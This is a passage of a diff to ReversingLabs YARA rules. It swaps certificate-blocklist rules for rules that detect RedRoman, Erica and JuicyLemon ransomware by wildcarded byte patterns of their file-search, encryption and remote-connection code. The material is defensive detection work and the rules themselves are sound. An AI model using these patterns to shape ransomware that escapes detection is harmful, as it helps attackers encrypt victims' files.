8B 4B ?? 51 + FF 15 ?? ?? ?? ?? 83 E0 ?? 74 ?? 8B 53 ?? 52 FF 15 ?? ?? ?? ?? 83 E0 ?? 50 8B 43 ?? + 50 FF 15 ?? ?? ?? ?? 8B 4B ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 53 + ?? 52 8D 45 ?? 50 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? C6 45 ?? ?? 8D 55 ?? 52 8B 43 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 + ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D + 4D ?? 51 83 EC ?? 8B D4 89 A5 ?? ?? ?? ?? 52 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 43 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? + C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? + 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C2 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Media Lid" and pe.signatures[i].serial=="2c:e2:bd:0a:d3:cf:de:9e:a7:3e:ec:7c:a3:04:00:da" and 1493337599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) and (($exclude_directories_and_drop_ransom_note) or ($drop_ransom_note_no_dir_exclusion)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0Fbc30Db127A536C34D7A0Fa81B48193 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Redroman : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects RedRoman ransomware." author = "ReversingLabs" - id = "c755a6c1-e113-5513-9a61-87bf6d7dcb3e" - date = "2023-11-08" - modified = "2023-11-08" + id = "c860586a-fa50-5bb4-a3b4-13506f9d6030" + date = "2021-05-10" + modified = "2021-05-10" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2248-L2264" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6b109b5636aa297a6e07f9d9213f7f07a7767b58442d03dc2f34f8a9b3eaba2b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.RedRoman.yara#L1-L82" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6fb2ac0e7f7ac095766e27c057e5124406dc493c08d01a7e5381403d794c7240" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "RedRoman" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Megabit, OOO" and pe.signatures[i].serial=="0f:bc:30:db:12:7a:53:6c:34:d7:a0:fa:81:b4:81:93" and 1466121599<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_08448Bd6Ee9105Ae31228Ea5Fe496F63 : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "489ffe25-43cf-55b6-b249-17d251b9774e" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2266-L2282" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9bc044b4fdf381274a2c31bc997dcdfd553595d92de7b33dc472353a00011711" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_p1 = { + 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? + ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? + ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? + ?? ?? BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 C7 84 + 24 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? + ?? ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 6B C9 ?? 48 89 84 0C ?? ?? ?? ?? 48 C7 84 24 + ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 83 BC 04 ?? + ?? ?? ?? ?? 74 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84 + 24 ?? ?? ?? ?? EB ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? + E9 ?? ?? ?? ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 89 01 48 8B 44 24 ?? 48 8B + 40 ?? 48 83 38 ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? B8 ?? ?? + ?? ?? 48 6B C0 ?? 48 83 BC 04 ?? ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 8B + 8C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 + } + $encrypt_files_p2 = { + 4C 8D 05 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89 + 55 ?? 48 89 45 ?? EB ?? 31 C0 41 89 C0 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89 + 45 ?? EB ?? 48 8B 45 ?? 48 83 F8 ?? 74 ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? EB ?? EB ?? 48 81 C4 ?? ?? ?? ?? 5D C3 48 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 48 8B + 85 ?? ?? ?? ?? 48 85 C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? + ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? + ?? ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? + ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? + ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? + 48 89 85 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? + 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 85 + C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? + ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? + ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? + ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? + 48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 8D + } + $find_files = { + 48 8D 9C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D9 31 D2 E8 ?? ?? ?? ?? 48 8B 0F 48 + 89 DA E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 8D B4 24 ?? ?? ?? ?? 48 8D 9C 24 ?? + ?? ?? ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? EB ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0F 48 + 89 DA E8 ?? ?? ?? ?? 85 C0 74 ?? 66 83 BC 24 ?? ?? 00 00 ?? 75 ?? 0F B7 84 24 ?? ?? + ?? ?? 66 85 C0 74 ?? 66 83 F8 ?? 75 ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? 48 8B 47 ?? + F0 48 83 00 ?? 0F 8E ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 41 + B8 ?? ?? ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? 48 8D 4E ?? 48 8D 94 24 + ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 + C7 06 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? C6 46 ?? ?? 89 46 ?? 48 + 89 F0 0F 28 B5 ?? ?? ?? ?? 0F 28 BD ?? ?? ?? ?? 44 0F 28 85 ?? ?? ?? ?? 44 0F 28 8D + ?? ?? ?? ?? 44 0F 28 95 ?? ?? ?? ?? 44 0F 28 9D ?? ?? ?? ?? 44 0F 28 A5 ?? ?? ?? ?? + 44 0F 28 AD ?? ?? ?? ?? 44 0F 28 B5 ?? ?? ?? ?? 44 0F 28 BD ?? ?? ?? ?? 48 8D A5 ?? + ?? ?? ?? 5B 5F 5E 41 5E 5D C3 0F 0B + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Raffaele Carnacina" and pe.signatures[i].serial=="08:44:8b:d6:ee:91:05:ae:31:22:8e:a5:fe:49:6f:63" and 1445212799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_02F17566Ef568Dc06C9A379Ea2F4Faea : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Erica : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Erica ransomware." author = "ReversingLabs" - id = "a14e16ff-844c-53ff-9297-8760265da747" - date = "2023-11-08" - modified = "2023-11-08" + id = "38f57157-bd49-5a63-8c69-497eb9efe274" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2284-L2300" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e3ec8a6de817354862880301e78a999f45f02c2fa8512bba6d27c9776f1a3417" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Erica.yara#L1-L76" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "93512091943f3a3b395c38fa3b0f5ecdbbf1cdf967ccfea4d7145c940076e046" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Erica" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VALERIANO BEDESCHI" and pe.signatures[i].serial=="02:f1:75:66:ef:56:8d:c0:6c:9a:37:9e:a2:f4:fa:ea" and 1441324799<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_7D824Ba1F7F730319C50D64C9A7Ed507 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "4372aea7-a25b-5211-befd-9e0bcfb09199" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2302-L2318" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "407611603974c910d9a6a0ed71ecdf54ddcc59abb0f48c60846e61d6d4191933" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B F2 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 + ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 8A 43 ?? 2C ?? 72 ?? 74 ?? EB ?? BF ?? + ?? ?? ?? EB ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? 33 DB 68 ?? ?? ?? ?? 8B 45 ?? 50 + 8B 45 ?? 50 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 6A ?? 6A ?? 57 8B 06 50 + E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? + 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 6A ?? 8B 45 ?? 50 8B 45 ?? 50 + 8B 06 50 E8 ?? ?? ?? ?? 85 C0 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? BB ?? + ?? ?? ?? EB ?? BB ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 5A + 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 + } + $encrypt_files_p2 = { + 8D 40 ?? 55 8B EC 83 C4 ?? 53 33 DB 89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 33 C0 + 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 33 C0 89 45 ?? 33 C0 89 45 ?? 33 + C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 50 8B 45 ?? 8D 50 ?? 8B 45 ?? 33 C9 + E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 83 C0 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B + 40 ?? E8 ?? ?? ?? ?? 8B D0 4A 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? E8 + ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8B 45 ?? 8B 48 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 + ?? ?? ?? ?? 8B 45 ?? 50 53 8B 45 ?? 50 8B 45 ?? 50 8D 4D ?? 8D 55 ?? 8B 45 ?? E8 ?? + ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? + 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 8B 45 + ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 8B 45 ?? 83 C0 ?? 8B 55 ?? + E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A + ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? C7 45 ?? ?? ?? + ?? ?? 8B 45 ?? 83 C0 ?? 8B 55 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? EB + ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? + ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 45 + ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? 8B 4D ?? E8 ?? ?? + ?? ?? C3 + } + $find_files = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89 + 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF + 30 64 89 20 8B C3 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? + 80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 + ?? 80 38 ?? 75 ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 95 C0 EB ?? F7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 3B ?? 74 ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + FF 33 FF 75 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? + ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "joaweb" and pe.signatures[i].serial=="7d:82:4b:a1:f7:f7:30:31:9c:50:d6:4c:9a:7e:d5:07" and 1238025599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_77A64759F12766E363D779998C71Bdc9 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Juicylemon : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects JuicyLemon ransomware." author = "ReversingLabs" - id = "98acd01b-c452-530d-8814-2591810ecd53" - date = "2023-11-08" - modified = "2023-11-08" + id = "35e4bbd6-422b-562e-98fc-fe932270dbb8" + date = "2020-08-17" + modified = "2020-08-17" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2320-L2336" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2bf3d99ddec6b76da1ca60a9285767a5b34b84455db58195fc5d8fd8a22c9f8a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.JuicyLemon.yara#L1-L116" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "596d89843793307f4940dbb85b2e7081f02250f6adfdcd01f2d3c5f2b8b90875" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "JuicyLemon" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection_1 = { + 55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B FA 8B F0 C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? + 6A ?? FF 15 ?? ?? ?? ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 56 53 FF 15 ?? ?? ?? + ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 56 FF 15 + ?? ?? ?? ?? 8B F8 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF + 15 ?? ?? ?? ?? 85 C0 74 ?? C6 45 ?? ?? 57 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 53 + FF 15 ?? ?? ?? ?? 8A 45 ?? 5F 5E 5B 59 59 5D C2 + } + $remote_connection_2 = { + 55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? + 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 55 ?? 8B + 45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? + ?? 66 BE ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 66 BE ?? ?? 8D 45 ?? E8 + ?? ?? ?? ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D6 + 59 E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $find_files_and_encrypt = { + E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85 + ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 + ?? ?? ?? ?? 46 4B 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 + A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74 + ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 80 C2 ?? E8 + ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 8B 00 FF + D0 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ?? + ?? ?? ?? 8B D3 80 C2 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 95 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ?? + ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 4B 80 FB ?? 0F 85 ?? ?? ?? ?? 57 A1 ?? ?? ?? + ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1 + ?? ?? ?? ?? 8B 00 FF D0 EB ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 46 ?? BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ?? ?? ?? ?? 57 A1 ?? + ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? + ?? ?? ?? 8B 00 FF D0 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? + ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? A1 ?? ?? ?? ?? BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 